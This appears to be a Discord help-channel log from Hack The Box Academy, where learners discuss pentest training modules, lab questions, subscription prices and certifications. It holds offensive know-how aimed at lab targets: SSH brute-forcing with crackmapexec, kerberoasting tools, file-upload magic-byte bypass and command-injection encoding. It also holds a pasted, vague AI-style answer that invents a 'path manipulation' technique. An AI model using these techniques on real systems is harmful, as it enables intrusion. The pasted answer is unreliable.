well i saw that it puts out a location i can't paste it into a codeblock here the bot stops me from doing it
bunch of other headers
oh wait nope sorry i did -IL i see a huge html code now
cool, if the flag is in the htb format you could just curl -L http://$IP/ | grep -i htb
oh I'm not looking for a flag in the website, it's available in clearnet, it was @restive basin
I just finished the nmap module, and it was pretty nice what you learn, most the questions left me relying on the internet for answers lmao no way i would've gotten them on my own
"find the most recently added special service" lol
Okay sorry y'all I've gone through the 26 other posts trying to solve this have googled and search on HTB Academy forum and cannot seem to find the answer for the question on the Linux Fundamentals->Find Files and Directories Q1.) What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
I've used different variants of the command:** find / -type f -name .conf -user root -size +25 -size -28 -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null*. I've tried changing name to *conf, I've tried without user command, I've tried without exec ls but nothing is giving any answers that works. I've checked out the video on YouTube of stuffy24 and didn
^and didn't see a solution to this problem.
Havent done this module but was it indicated that the owner of the config file is the root user? also .conf is not the only linux configuration file extension
try running the command again with -iname "*conf*" instead of -name and without specifying a user
I will try that real quick thank you @faint rampart
also you arent closin the -exec argument properly.
It should error out instead use -exec ls -la {} \;
@faint rampart here is the most recent code I tried it isn
isnt pulling up any files find -type f -iname *.conf -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null
find / -type f -name "*.conf" -size +25k -size -28k -newermt 2020-03-03 -exec ls -la {} \; 2>/dev/null
missed a backslash there
I think discord filters that out back slashes that arent in code blocks
ya i was gunna say the slash isnt showing up on discord im gunna try to add a screenshot
Attacking Authentication Mechanisms module question:
In the section "Weak Public/Private Keys" I'm not able to import the certificates into SAML Raider Certificates. It just shows the error message: "Error reading file. (signed overrun, bytes = 466)".
Did anyone face the same issue?
It interpreted it as an escape char
use backticks. 3 on the outside ``` like so
3 on each side.
print(hello)
``` it'll appear like this. If you use 1 it'll look like this `print(Hello)`
https://support.discord.com/hc/en-us/articles/210298617-Markdown-Text-101-Chat-Formatting-Bold-Italic-Underline-
It'll help you show what you are actually sending when you need help with modules
excuse me sir your python snippet is wrong, hello is not defined, please make sure to declare the variable beforehand or if you're trying to print a string directly, wrap "hello" in quotes
Thank you everyone the quotations made a huge difference gosh I feel so silly missing such a detail, but I don't feel like it was mentioned in the module. Perhaps I should take another read through.
when is the senior web penetration tester path going to have a discord section?
when the cert comes out probably
ok got it
but the learning path is already up?
so I didn't know the learning path and cert comes out at different times
interesting
by the time I complete CPTS there's gonna be a bunch of different penetration testing paths lmao
🤷 it will take a couple of months before someone finishes the new path
right ok
Hey ! I was doing stack_bof_linux module and in the final Assessment they ask you to submit size of the stack after overflowing the EIP
I did that but the answer is not true for some reason
I used info proc mapping / info proc all
Got the root flag as well but still can't find the answer to that
been a while since I've finished it but I think you're supposed to find the answer in gdb
are the pro labs worth it in your view?
Yeah i did that previous section had the same question . and by checking the same way i did r8now the answer was acceptable
I've rebooted the machine tried multiple times but the stack size is not acceptable as the answer
`0x55555555 in ?? ()`
`0xfffdd000 0xffffe000 0x21000 0x0 [stack]`
0x21000
try using info proc all in gdb
yeah they're very fun to do and well made, you can do 2-3 pro labs with a single month of sub
new AD advance module look so cool and scary
That module is on my todo list...
Im gonna check if its teaches a technique i like a lot for persistence: golden certificate
varies, dante is the easiest, zephyr is full AD, offshore is slightly more difficult than those
that's in the kerberos attacks module
This module focuses on privilege escalation attacks by abusing misconfigurations in Active Directory Certificate Services.
that the description said
i dont say about a golden ticket, im talking about a golden certificate generated in a PKI
: ) .. Just asking simple question about a room
I'm getting a feeling there's gonna be a more advanced learning path that builds upon CPTS soon. I mean they just made one for CBBH so its a guess.
it is
I'm already doing it 
that should give you the answer
Is it good?
Answer is there i can see it , but it's not acceptable for some reason
`0xfffdd000 0xffffe000 0x21000 0x0 [stack]`
I can see the size of the stack
But room is not accepting that as an answer
No I know there's a "Senior Web Penetration Tester" path but I predict there also probably will be a "Senior Pentesting Specialist" path too by the time I complete CPTS
yes its on going
advance AD
yeah, not very far into it yet but it's the standard you'd expect for these types of modules
but they already have an advanced AD path
so you can confirm? how'd you get this information if I may ask
i dont see advance AD path yet in academy
well idk how to tell you without giving the answer but 0x21000 is slightly off
Ok so there's an AD path where all of the sections are hard level. So your saying there's gonna be another path that goes even further?
Well that's what i'm getting after restarting the machine multiple times and checking the stack after overflowing eip with info proc all command
like insane level?
(:
someone say that, HTB will make advance AD path like CWEE
ok but what about a path that builds upon CPTS path? have you heard anything on that?
and what about a wireless hacking path?
or reverse engineering, OSINT, or social engineering?
one of those would be perfect
Can anyone help me out with problems I am having with targetedKerberoast.py? I am not sure if I am having time skew issues or if something else is broken.
Python penetration testing path would be perfect
I think you could have a path that combines SE and OSINT into a path no?
best I can give you is your answer is 1000 off, I forgot how I got it exactly but pretty sure it was just info proc all
Thank you
its expected you know a little bit of scripting before you begin no? Also, they do have an intro to Python course. However, I have not done it.
a course but not an entire learning path. ya I am learning Python currently. I probably will be ready by the time the path comes out since I don't expect it to come out tomorrow
a C/C++ exploit development path would be fabulous
it's likely that one is coming but nothing concrete yet, but probably not wireless though
As for the senior path, its definitely required.
ya ok. I guess we don't have to have everything
that module is very basic haha
I'm thinking of something beyond basic or that goes through a more advanced level. Something that uses Python to expand upon skills built in the other penetration testing paths
this would really be a good idea
and by that point you're an advanced hacker
minus maybe the wireless skills and other skills
but someone who completed all of that would be very impressive
I feel like an OSINT path would flow quite nicely
in my view
htb academy subscription is so expensive man
what is it
500$

I am getting this error:
If you are a student you can get it for 8$/mo + cost of certification exam and you get access to all Tier 2 modules and below.
I know. I have student discount. I generally pay monthly. But I would pay yearly if most of the learning paths I'm thinking of actually came out. Right now I have student discount.
what is cost of yearly subscription after student discount?
im talking about academy
student discount is $8 per month for academy
sync clock, search up the ways you can do it
so after that its $18/month for similar
Yes, I have tried ntpdate and faketime, but they aren't working
but if you pay yearly you get access to more advanced stuff
whats the cost after student discount
if you pay for the gold annual member, not if you pay for the silver annual.
its about 100$ for the year. + cost for certification attempts.
then you didn't do it right, ntpdate against the DC
thats much better
it's also not a "discount" btw, it's a student plan for $8 a month
This is what I did:
but if you have questions regarding pricing you can always contact support. π
Need to speak to a person? Learn how to reach our support via HTB Labs.
ya I know but I would save up money to pay for gold once I get my part-time job at Apple Store just to be able to work through the advanced stuff
because its probably worth it long term
I may get a separate bank account and save up money or for buying cubes or some shit
because its probably worth it for the skills
that should work, try again after that, if it still doesn't work, reset the target
is the upcoming CWEE cert > then OffSec's OSWE?
Okay, thanks...I did a fresh install of kali, so I was wondering if that had anything to do with it because it was working before
I doubt the fresh install would be the problem
if the track record of both is anything to go by, CWEE's content and exam will be far superior than OSWE
wow ok. that's great. ya that's why I think its worth it
because then what's better: having OSWE + OSEP certs that employers recognized or having more advanced skills from HTB Academy and frankly be able to pass all of those OffSec ezpz but being far more skilled?
what is better for a penetration testing career? seriously
better hacking skills is what I want tbh
all they need is exploit development courses and reverse engineering courses IMO
or reverse engineering/exploit dev learning paths
and there's enough material to be superior to OffSec
that's the only thing missing
in terms of skills
I do think that by the time you start OSEP there should be some experience under your belt which can speak for themselves without needing the certs, and anyways those should really be paid by your employer from the training budget
doing the advanced certs without first getting some experience is not ideal imo
I know and HTB Academy gets you a lot more experience
like in terms of hacking skills
well, yes, but you can't replace real world experience, employers care more about those
GetUserSPNs.py works but targetKerberoast.py doesn't...do you know why that could be?
wouldn't bug bounties be a good way of getting real world experience? I mean I totally get it
ya no I get it
no clue, I don't use targetKerberoast.py, it's always been GetUserSPNs.py or netexec
I gotta get to bed but ya this is crazy stuff
nxc --kerberoasting isn't working for me either
I'm gonna get some shut eye. good night everyone
same error?
Yes:
hecker
Seems to be confirmed now
Maybe you need a lot of wine after the exam to wash away the frustration 
booooooooooooo
i think its more about hot dogs wieners
lol you should get verified by following the instructions at #welcome so your messages don't get deleted
i cant verify myself -- it errors out
should be just /identify <your htb identifier>
Identification error: please contact an online Moderator or Administrator for help.
well maybe you should do that then
How can i reach admin
dm @languid fjord probably (sorry for ping 🫡 )
it's a sat so it might take a while
You can send me a dm
Module: Attack Web Apps Section: Other Notable Apps --- connection issues:
```
PING 10.129.201.102 (10.129.201.102) 56(84) bytes of data.
64 bytes from 10.129.201.102: icmp_seq=1 ttl=127 time=368 ms
64 bytes from 10.129.201.102: icmp_seq=2 ttl=127 time=1900 ms
64 bytes from 10.129.201.102: icmp_seq=3 ttl=127 time=1036 ms
64 bytes from 10.129.201.102: icmp_seq=4 ttl=127 time=168 ms
64 bytes from 10.129.201.102: icmp_seq=5 ttl=127 time=3834 ms
64 bytes from 10.129.201.102: icmp_seq=6 ttl=127 time=2956 ms
64 bytes from 10.129.201.102: icmp_seq=7 ttl=127 time=1945 ms
64 bytes from 10.129.201.102: icmp_seq=8 ttl=127 time=929 ms
64 bytes from 10.129.201.102: icmp_seq=9 ttl=127 time=98.2 ms
```
Oh, discord channel for new cert only dropping when exam drops? Just curious.
tbh, i don't know
switch vpn server, check your connections, get better internet? not much can be done tbh
Our first advanced level cert 🔥💪🏻
I'm looking forward to it. But I'm sure I still have a lot to learn
It will be possible to buy the exam using a voucher (after the path)? Or only from the gold plan?
@next bronze changed vpn but connection issues persist -- dont think my internet is slow -- maybe you can spawn that machine to see if it works for you?
Previously, there were separate examination vouchers for the Certs. I think that's the case again.
There are people like me who bought the cubes for the modules. The subscription does nothing for me.
works for me
ping is also stable?
Yeah, same for me. I've done CBBH and from cubes that i already have even with the discount the subscription can be inconvenient.
Module Windows Privilege Escalation/Citrix Breakout: cannot connect from the Citrix machine to my smbclient. Connect from my localhost works fine. Tried own VM and pwnbox. I see few questions but none of them were answered, any ideas how to resolve? Thanks.
the citrix instance can only connect to the linux machine you RDP'd into
hey i am old here
@sullen cedar
its me
anyone help me pass the academy module
interactive section with terminal
alr
its wrong
@gaunt surge
Hi I am stuck in the password attacks module. I am at the protected files section. There is only one task
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
I cannot remember if I ever cracked someone named kira. Can someone nudge me in the right direction as I cannot even log in to the machine. At this point I have started a brute force attack. if you have the password for kira and think I am in the right direction please dm me the password
you cracked the kira password in one of the previous sections
I was checking all the previous sections could not find it. and I have started taking detailed notes from pass-the-hash section. Can you please tell me which section I have to redo again?
you can crack in the current section you're in now
hi guys i am stuck in this question
Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.
i did this 10.10.10.0/29
but it shows incorrect
@sterile epoch
stop randomly @ ing people
hey
@sullen cedar is my account only
duxsec is my friend
and i pinged this guy for my question
that's... not how you're gonna get answered tbh
https://www.calculator.net/ip-subnet-calculator.html here's something to help you get started
thx marcie
take a look at this as well
i already know this but thx
note i found this information by using the all powerful "Google"
yea
well if you already knew it, you wouldn't be struggling
Not using chatgpt?
No, I don't tend to use chatGPT so I can find information more reliably
¯\_(ツ)_/¯
Be nice to each other guys!
Don't wanna go off potentially incorrect information
its not helping
Generally most the stuff for chat got you'd use is going to properly classified
hi i need help im getting really frustrated with this one im doing "Linux privilege escalation" and the Linux Services & Internals Enumeration part. the question is What is the latest Python version that is installed on the target? i have checked everything they named in the module at this time and i only get the same python version every time Python 3.8.10 . help me please
Choosing chat for something involving people
is it asking for just the version number or the full "Python 3.8.10"

this is me being nice
No this is you with dunning kruger
You have a tiny bit of info
Go get me a cracked IDA
brother go eat your chatGPT skittles elsewhere
Dude you're toxic you are learning this as well
i have tried with the 3.8.10
Literally safelane carry missing last hits
lots of what you're saying makes very little sense
maybe if you spoke coherently i'd engage with you better
either way; detracting from the ongoing discussion
they asked for the latest version, it's not this
wouldn't that be using which python?
Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.
Xre0uS can u tell me
it should be yeah, but the answer I have is not 3.8
you gotta learn it on your own how to split
..
i gave you links to resources to 1; get you started and 2; to explain
..
because that's not how a 10.200.20.0/27 network is gonna be split
again if you knew how to split you're not gonna get 10.10.10.0/29 out of 10.200.20.0/27
¯\_(ツ)_/¯
why are u irritating me marcie
the calculator link i gave you will give you the range of addresses you will use
start there
dont
just dont
i'm being honest: you're swearing 10.10.10.0/29 is correct - it's not gonna be
how can i check what the latest version is then? i dont find this in the module at all
I mean, there are 32 addresses in 10.200.20.0/27, just do some simple math
python3 -V ?
even chatgpt cant answer
Of course it can't, ChatGPT shouldn't be your source of information
googling is fun i found a visual aid from cisco http://cisco.num.edu.mn/CCNA_R&S1/course/module9/9.1.3.4/9.1.3.4.html#:~:text=Borrowing 2 bits creates 4,mask is represented as 255.255.
yeah, good ol CCNA
honestly this helped me visualize it a bit better
even if it's not the same EXACT scenario
it's pretty easily translatable if you apply some thought
the answer format x.x.x
hi guys if i subscribe gold monthly can i access all senior web pentester path ?
No
Gold Monthly is different from gold Annual
you need to buy the Annual one
okey thanks
yeah i got it
However Gold Annual Value Drops off significantly if you've already done some of the other paths
even with the current discount
thanks ❤️
it's been currently worked out to be cheaper to do like 8 months of plat and buy the voucher for ~$200 than to A: flat out buy Cubes, and B: the NOT discounted Gold Annual Price
Hello. I asked this like a week ago, but I was not able to find a response and had to work. My question is: about the Windows Finding Evil projects. Is anyone else having issues connecting or maintaining a connection to any of the Windows boxes? I cannot seem to be able to connect for more than a few seconds.
switch to tcp connection
Thank you very much. I will try that in a bit. I am trying to finish up this Splunk section. I appreciate your assistance.
rdp stuff has been notoriously jank if you're using the UDP vpn pack
who knows ruby attack
u know
are you specifying an attack made with the programming language 'Ruby'
if so, many exist
but it also sounds unrelated to htb academy
It's funny but I totally agree now, the Intermediate NTA is definitely easy, the questions are very simple. The Intro to Network Traffic Analysis was a bit more challenging.
The difference is that the Intermediate one has more complex attacks and methodologies.
Pretty neat huh
in which case: this isn't a gen chat
advanced command obfuscation Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1 found a way to run command but what is needed not working? Anyone can help me?
it looks like you're grepping for one thing after the other, and not two things at once
take it
hello i make the skill assessment file upload i have modified the magic byte of my php file put the ymd before my file but i have not found like this
that's not even related to what they're asking, just because there's sql in the command doesn't mean it's SQLi
is there a target for you to ssh into to run the command?
no, just command injection via webpage
if it's not found it means the file is not uploaded, and anyways if the file is uploaded as .jpeg you won't get command execution out of it
hey i thought it dude
tried that and still didn't get the answer
does it break at some point?
ik it
cause that sounds odd
worst case is respawn target and try again and it works
the command is given by the question, but can't remember how I did it
ok
The command provided includes a series of operations: first, it looks through the "/usr/share/" directory for specific files, then it filters the results to include those containing "root", followed by a further filter for those containing "mysql", and finally, it displays the last result.
The output for the command can be found using a technique called "path manipulation." In this case, by manipulating the directory paths within the command, we can determine the likely output without actually executing the command.
In this particular command, the "find" command searches through the "/usr/share/" directory and its subdirectories for files or directories, the first "grep" command filters for lines containing the word "root," the second "grep" filters the previous results for lines containing the word "mysql," and finally, "tail -n 1" restricts the output to the last line of the filtered results.
By analyzing the structure of the command and the typical contents of the "/usr/share/" directory in a Linux system, it may be inferred that the command provided may not yield any output, or it might display the path to a file or directory that contains "mysql" in its name and "root" in its path, given that the command is searching through the "/usr/share/" directory.
It's important to note that this command could yield different results depending on the specific system and its file structure. Without actually executing the command, the precise output cannot be determined with absolute certainty. Always exercise caution when using advanced command obfuscation techniques and ensure that commands are used responsibly and with proper authorization.
yeah i misread it the first time
get your chatGPT ass outta here
it's literally not helping at all
so anyone knows the solution :D?
see @fathom pendant i dont wanna be rude
you literally threw it into chatGPT and copy/pasted what it said, without providing ANY valuable input
pretty sure it's using one of the techniques taught in the section
at least i told him dumba$$
told him what?
u literally speak too much
you literally just spat back out a chatGPT answer
what he asked
and yea if u dont know bout sql and sql injections just stfu
don't debate pls
except that's not what he asked
lmao wtf
it is not related to sql injection
reading comprehension is hard my guy
related to OS command injection
^
its related to sql
marcie u are irritating me a lot cant u just stfu
doesn't mean it's related to SQL
you're literally not providing any valuable input :)
doing Command Injections topic there is no sql injection
you really telling the guy who's doing the question what the question is related to? lol
anyway @mint solstice double check if you need to urlencode anything, have you tried sending the request through burp repeater so you can modify it to see if urlencoding a different character yields a different result?
see i might be wrong but who told this marcie to argue
did you encode spaces with %20
iirc that's urlencode spaces, might need to double check
huh For example, spaces in a string are either encoded with %20 or replaced with the plus sign ( + ). If you use a pipe character ( | ) as a separator, be sure to encode the pipe as %7C . A comma in a string should be encoded as %2C thanks google
can a dm you @fathom pendant ?
My brute force attack just finished and sadly I could not get any result. I used the command
crackmapexec ssh 10.129.x.x -u "kira" -p password.list
please help
i haven't done this module, maybe ask @next bronze if they wanna dm
brute force a different protocol
I tried ftp but it timed out
also you need to use the mutated password list
-t 48
that's by far the most stable (ish) threads
I am stuck at protected files section
can I dm you?
after you create the mutated list, you use it in practically every other section after
